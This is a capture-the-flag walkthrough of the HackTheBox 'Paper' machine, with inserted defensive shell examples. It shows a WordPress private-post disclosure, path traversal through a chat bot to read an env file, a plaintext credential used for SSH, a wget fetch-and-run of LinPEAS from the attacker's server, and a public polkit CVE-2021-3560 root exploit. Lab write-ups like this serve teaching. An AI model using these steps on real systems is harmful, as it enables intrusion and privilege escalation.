HackTheBox — Paper (w/o Metasploit)
Paper was an interesting machine from the beginning. While it’s marked as easy, it definitely takes some thinking as you’ll face some uncommon steps to get to where you’re going.
Enumeration
Let’s start by scanning with nmap by using the following command:
nmap -n -sC -sV -p- 10.10.11.143
We see three ports open based on the response — 22 (ssh), 80 (http), and 443 (https).
Let’s try visiting the URL by going to http://10.10.11.143.
Again, there isn’t much to see here. Let’s see if we can gather some data using the following curl command:
curl -I 10.10.11.143
The capital I (-I) tells curl to send a HEAD request, so only the response headers come back, without the body of the page.
One thing stands out in this response — the X-Backend-Server header. Its value, office.paper, looks like a hostname we can visit, so let’s add it to our /etc/hosts file by running
sudo nano /etc/hosts
and appending a line that maps the target IP to that hostname:
10.10.11.143 office.paper
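The header-to-hosts step above can be scripted so it is repeatable and does not leave duplicate lines behind. The following is an added example and not part of the original write-up; the response headers are a constructed sample (only the X-Backend-Server line mirrors what the box returns), and the hosts file path is a parameter so it can be pointed at a scratch file instead of /etc/hosts.

```shell
#!/bin/sh
# Added example: extract a hostname from HTTP response headers and add it to a
# hosts file idempotently. Not code from the write-up.

# Constructed sample of a `curl -I` response. Only the X-Backend-Server line
# reflects the real response; the other header values are illustrative.
SAMPLE_HEADERS='HTTP/1.1 403 Forbidden
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache
X-Backend-Server: office.paper
Content-Type: text/html; charset=UTF-8'

# header_value NAME HEADERS: print the value of header NAME, matched
# case-insensitively. Strips the CR that terminates HTTP header lines.
header_value() {
    want=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    printf '%s\n' "$2" | tr -d '\r' | awk -v want="$want" '
        index($0, ":") > 0 {
            name = tolower(substr($0, 1, index($0, ":") - 1))
            if (name == want) {
                val = substr($0, index($0, ":") + 1)
                sub(/^[ \t]+/, "", val); sub(/[ \t]+$/, "", val)
                print val; exit
            }
        }'
}

# Escape regex metacharacters (dots) in a literal IP or hostname.
re_escape() {
    printf '%s' "$1" | sed 's/\./\\./g'
}

# add_hosts_entry HOSTS_FILE IP NAME...: append "IP NAME..." to HOSTS_FILE
# unless a line already maps IP to the first NAME. On a real host pass
# /etc/hosts (with sudo); the usage below writes to a temporary file.
add_hosts_entry() {
    hosts=$1; ip=$2; shift 2
    ip_re=$(re_escape "$ip"); name_re=$(re_escape "$1")
    if grep -Eq "^[[:space:]]*$ip_re[[:space:]](.*[[:space:]])?$name_re([[:space:]]|\$)" "$hosts" 2>/dev/null; then
        return 0                                   # already present
    fi
    printf '%s %s\n' "$ip" "$*" >> "$hosts"
}

# Usage: pull the backend hostname out of the sample and stage a hosts line.
backend=$(header_value X-Backend-Server "$SAMPLE_HEADERS")
echo "backend host: $backend"
scratch=$(mktemp)
add_hosts_entry "$scratch" 10.10.11.143 "$backend"
cat "$scratch"
rm -f "$scratch"
```

Running the same add_hosts_entry call twice leaves a single line, which matters when the same entry is extended later (adding chat.office.paper to the line) rather than appended blindly.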
Now let’s try going to http://office.paper. Now we’re seeing something different!
It’s always a good habit to read through the page and gather as much data as you can. Sometimes you can find some important info in the details. For example, scrolling all the way to the bottom of the page shows that the site was made using WordPress.
We can use an open source WordPress vulnerability scanner called wpscan to get some more details about this installation. Maybe there’s a vulnerable version, plugin, or theme that we can exploit. To scan the site using wpscan, run the following command:
wpscan --url office.paper
According to wpscan, this installation is out of date. The site is running WordPress version 5.2.3. If we go to www.exploit-db.com and search “Wordpress 5.2.3”, we find a vulnerability named “WordPress Core < 5.2.3 — Viewing Unauthenticated/Password/Private Posts”. According to this vulnerability, we can view “secret content” by adding ?static=1 to the URL.
We can test this out by visiting http://office.paper/?static=1
It works! This vulnerability reveals private posts, which in our case is great because there appears to be a secret registration URL for the new employee chat system in that private post. Before we can go there though, we’ll need to add that hostname to the /etc/hosts file as well. Again, use the following command:
sudo nano /etc/hosts
and add chat.office.paper to the end of the previous entry, so the line now reads
10.10.11.143 office.paper chat.office.paper
Now, let’s try copying and pasting that secret chat URL. This will take you to a registration page for Rocket.Chat. You don’t need to use a valid email here. In my case, I just used test@test.test.
After joining and waiting for a minute or two, the chat content should appear. There appears to be a conversation going on about a bot that was set up by DwightKSchrute. Again, don’t skip out on the details.
According to the conversation, you can call the bot by saying its name. Except there’s one problem… the room is read-only. Is there another way to talk to the bot?
If you hover over the bot’s name, there appears to be a direct message option.
According to the chat, you can get a list of commands by typing recyclops help.
It looks like we have a lot to play with here.
Exploiting Recyclops
If you look through the commands, you should see two that look interesting — Files and List. Files allows you to retrieve files, and List allows you to see which files are available.
So what happens if we try recyclops list ../ ?
This shows us the files in the parent directory, which means the bot doesn’t restrict the paths it is given. Looking through these files, bot_restart.sh looks like an interesting one. Let’s take a look at that one. To retrieve the file, type recyclops file ../bot_restart.sh
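The bot’s list and file commands work because nothing canonicalises the requested path and checks that it still sits under the directory the bot is meant to serve. The following is an added example, not the write-up’s code and not the real bot’s code, showing the check that a file-serving command needs: confine_path lexically normalises a request (handling ".", ".." and repeated slashes) and refuses anything that would climb out of the base directory. BASE_DIR is an assumed, constructed location.

```shell
#!/bin/sh
# Added example (not from the write-up, not the real bot): confine a requested
# path to a base directory before touching the filesystem.
BASE_DIR=/srv/bot-files     # assumed location; the real bot's root is not given

# confine_path BASE REQUEST: print BASE joined with the normalised REQUEST, or
# return 1 if REQUEST would resolve above BASE.
confine_path() {
    base=${1%/}
    req=$2
    out=''
    old_ifs=$IFS
    set -f                          # no glob expansion while splitting
    IFS='/'
    set -- $req                     # split the request on '/'
    IFS=$old_ifs
    set +f
    for part in "$@"; do
        case $part in
            ''|'.') ;;                              # "//", leading "/" or ".": no-op
            '..')
                [ -z "$out" ] && return 1           # would leave BASE: refuse
                case $out in
                    */*) out=${out%/*} ;;           # drop the last component
                    *)   out='' ;;
                esac
                ;;
            *) out="${out:+$out/}$part" ;;
        esac
    done
    printf '%s\n' "$base${out:+/$out}"
}

# serve_file REQUEST: what a hardened "file" command would do. The traversal
# decision is made before any read, so a refused request never reaches disk.
serve_file() {
    path=$(confine_path "$BASE_DIR" "$1") || { echo "refused: $1" >&2; return 1; }
    echo "would read: $path"
}

# Usage: one legitimate request and one attempt to walk out of the base.
serve_file 'files/report.txt'
serve_file '../hubot/.env' || true
```

The check is purely lexical, so it is the right first gate, but if the base directory can contain symlinks the server also needs to resolve the final path (for example with realpath) and repeat the prefix comparison on the resolved result.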
The line bash /home/dwight/hubot/start_bot.sh& reveals two things. First, we have a username (dwight). Second, we have another interesting .sh file to look for. To read that file next, let’s type
recyclops file ../hubot/start_bot.sh
The line source /home/dwight/hubot/.env looks interesting, as source reads and executes the content of a file. Let’s see what /home/dwight/hubot/.env contains.
We have a password — Queensofblad3s!23
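The password was sitting in plaintext in a file that a startup script sources on every boot, which is exactly the kind of thing a quick audit of sourced env files should flag. The following is an added example, not from the write-up: audit_env_file reports an env file that other users can read or write and any credential-looking assignment in it (by key name only, never the value). The key-name patterns and the sample file contents are constructed assumptions, not the box’s real .env.

```shell
#!/bin/sh
# Added example (not from the write-up): audit a sourced env file for loose
# permissions and plaintext credential assignments. Returns 1 on findings.

# Key names treated as credentials (an assumption about common naming; it
# will also catch names such as COMPASS_MODE, so review findings by hand).
CRED_KEY_RE='^[[:space:]]*(export[[:space:]]+)?[A-Za-z_]*(PASS(WORD)?|SECRET|TOKEN|API_KEY)[A-Za-z_]*[[:space:]]*='

audit_env_file() {
    f=$1
    found=0
    [ -f "$f" ] || { echo "no such file: $f" >&2; return 2; }
    # Group/other permission bits from `ls -l` (columns 5-10 of the POSIX layout).
    perms=$(ls -ld "$f" | cut -c5-10)
    case $perms in
        *[rw]*) echo "$f: readable or writable by group/others (bits $perms)"; found=1 ;;
    esac
    # Credential-looking assignments: print the key, never the value.
    keys=$(grep -E "$CRED_KEY_RE" "$f" | sed -E 's/^[[:space:]]*(export[[:space:]]+)?//; s/[[:space:]]*=.*//')
    for k in $keys; do
        echo "$f: plaintext credential assigned to $k"
        found=1
    done
    return $found
}

# Usage: build a constructed sample env file (not the real one) and audit it.
demo_audit() {
    tmp=$(mktemp)
    printf 'export ROCKETCHAT_USER=bot\nexport ROCKETCHAT_PASSWORD=constructed-sample\n' > "$tmp"
    chmod 644 "$tmp"
    audit_env_file "$tmp" || echo "findings reported for $tmp"
    rm -f "$tmp"
}
demo_audit
```

On this box the permissions check alone would not have helped, because the bot read the file as the same user that owned it; the lasting fix is to keep the bot from reading outside its directory and to move the secret into something the bot process does not have to carry around in a sourced file.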
Looking back on our nmap scan from earlier, we saw that port 22 was open. Can we ssh as recyclops using this password?
Unfortunately not. We did see the username “dwight” though. How about that?
Success! We’re in. Don’t forget to grab the user.txt flag at this point.
Privilege Escalation
We can do some manual enumeration at this point, but the quickest way to knock out the basics is to use LinPEAS. LinPEAS (Linux Privilege Escalation Awesome Script) is a script that automatically searches for possible privilege-escalation paths and returns its findings in an easy-to-read report.
To start, first download it from the LinPEAS Github repo here: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Once you have it, go ahead and start a web server to transfer it onto the target machine by running this command locally, and from the same directory that contains the linpeas.sh file:
python3 -m http.server 8000
Now go back to the Paper server that you’re ssh’ed into and use wget to retrieve the file. Don’t forget, the server is running on port 8000, so use the following command:
wget http://your-ip-address:8000/linpeas.sh
Next, you’ll need to make the file executable, which you can do by typing the following:
chmod +x linpeas.sh
And finally, run ./linpeas.sh > linpeas.txt to save the report to a file.
Once it’s finished, any known exploit the system appears vulnerable to will be marked with the word “Vulnerable”. We can quickly look for this by using the following grep command:
grep 'Vulnerable' linpeas.txt
The server appears to be vulnerable to CVE-2021-3560. This is a vulnerability in polkit (the authorization service that decides whether an unprivileged process may carry out a privileged action, and the thing behind the password prompts you see when a desktop app asks for elevated rights) that allows an unprivileged local user to get a root shell on the system. We happen to be an unprivileged local user. We happen to want to get a root shell on the system.
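Before trusting a “Vulnerable” line from a scanner, it is worth checking the polkit version against the published range. The following is an added example, not from the write-up: polkit_affected takes the output of pkaction --version and says whether it falls inside the upstream affected range. The range used (introduced in polkit 0.113, fixed in 0.119) comes from the public upstream advisory for CVE-2021-3560, not from this page; distributions backport fixes without bumping the version, so a hit here is a reason to check the vendor’s package changelog, not a conclusion.

```shell
#!/bin/sh
# Added example (not from the write-up): defender-side version check for
# CVE-2021-3560 in polkit. Upstream range from the public advisory:
# introduced in 0.113, fixed in 0.119. Backported fixes are not detected.
FIRST_AFFECTED=113
FIXED_IN=119

# parse_pkaction_version STRING: print the release number as an integer.
# Accepts "pkaction version 0.115", "0.115", or the newer un-prefixed "123"
# form. Returns 1 if nothing parseable is found.
parse_pkaction_version() {
    rel=$(printf '%s\n' "$1" | sed -nE 's/^(pkaction version )?(0\.)?([0-9]+)([^0-9].*)?$/\3/p')
    [ -n "$rel" ] || return 1
    printf '%s\n' "$rel"
}

# polkit_affected STRING: true (0) if 0.113 <= version < 0.119,
# false (1) if outside that range, 2 if the string could not be parsed.
polkit_affected() {
    rel=$(parse_pkaction_version "$1") || return 2
    [ "$rel" -ge "$FIRST_AFFECTED" ] && [ "$rel" -lt "$FIXED_IN" ]
}

# check_local_polkit: run the check against the host this script runs on.
# Prints a verdict; exit 0 means "inside the upstream affected range".
check_local_polkit() {
    command -v pkaction >/dev/null 2>&1 || { echo "pkaction not installed"; return 2; }
    v=$(pkaction --version 2>/dev/null)
    if polkit_affected "$v"; then
        echo "$v: inside upstream affected range for CVE-2021-3560 (confirm against vendor backports)"
        return 0
    else
        echo "$v: outside upstream affected range (or unparseable)"
        return 1
    fi
}

# Usage: a constructed version string, then the live host if pkaction exists.
polkit_affected 'pkaction version 0.115' && echo "0.115 is in the affected range"
check_local_polkit || true
```

The mitigation side is the same package update that closes the range: on a host where the vendor’s polkit build predates their backport, updating polkit is the fix, and the version string after the update should fall outside the range or match the advisory’s fixed build.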
I looked around for a poc of this exploit by googling “CVE-2021-3560 github”. After testing a few, this one seemed to work best: https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
To use it, download the Python file and transfer it using the same wget method as we used for LinPEAS.
I had to run this Python file twice after the first round because the password failed. But after running it multiple times, it worked just fine :)
Grab the root.txt file and enjoy your victory.
Final Thoughts
I always like boxes that require me to dig and think, even if the privilege escalation portion takes two steps. Boxes like these, although easy, are surprisingly realistic. I’m not saying someone is going to have everything laid out for you. But security incidents do often come as the result of out-of-date/unpatched systems and poor security practices like plaintext passwords. This machine was entirely that, from beginning to end. I hope you enjoyed this write-up of Paper.